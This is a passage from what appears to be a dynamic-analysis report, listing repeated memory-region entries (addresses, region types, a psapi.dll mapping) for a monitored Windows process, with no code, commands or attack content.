start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8028 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8029 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8030 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8031 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8032 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8033 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8034 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8035 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8036 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8037 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8038 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8039 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8040 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8041 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8042 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8043 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8052 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8053 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8054 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8055 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8056 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8057 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8058 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8059 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8060 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8061 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8062 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8063 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8064 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8065 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8066 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8067 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8068 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8069 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8070 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8071 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8072 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8073 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8074 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8075 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8076 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8077 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8078 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8079 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8080 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8081 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8082 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8083 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8084 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8085 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8086 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8087 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8091 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8092 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8093 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8094 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8095 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8096 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8097 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8098 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8099 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8100 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8101 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8102 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8103 start_va = 0x779b0000 end_va = 0x779b4fff monitored = 0 entry_point = 0x779b1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 8104 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8105 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8106 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8107 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8108 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8109 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8110 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8111 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8112 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8113 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8114 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8115 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8116 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8117 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8118 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8119 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8120 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8121 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8122 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8123 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8124 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8125 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8126 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8127 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8128 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8129 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8130 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8131 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8132 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8133 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8138 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8139 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8140 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8141 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8142 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8143 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8144 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8145 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8146 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8147 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8148 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8149 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8150 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8151 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8152 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8153 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8154 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8155 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8156 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8157 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8158 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8159 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8160 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8161 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8162 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8163 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8164 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8165 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8166 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8167 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8168 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8169 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8170 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8171 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8172 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8173 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8174 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8175 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8176 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8177 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8178 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8179 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8180 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8181 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8182 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8183 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8184 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8185 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8186 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8187 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8188 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8189 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8190 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8191 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8192 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8193 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8194 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8195 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8196 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8197 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8198 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8199 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8200 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8201 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8202 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8203 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8204 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8205 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8206 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8207 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8208 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8209 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8210 start_va = 0x15e0000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8211 start_va = 0x1900000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 8212 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8213 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8214 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8215 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8217 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8218 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8219 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8220 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8221 start_va = 0x15e0000 end_va = 0x29e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 8222 start_va = 0x29f0000 end_va = 0x3df7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 8223 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8224 start_va = 0xce0000 end_va = 0xcf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 8225 start_va = 0xd00000 end_va = 0xd0dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 8226 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8227 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8228 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8229 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8230 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8231 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8232 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8233 start_va = 0xce0000 end_va = 0xcedfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 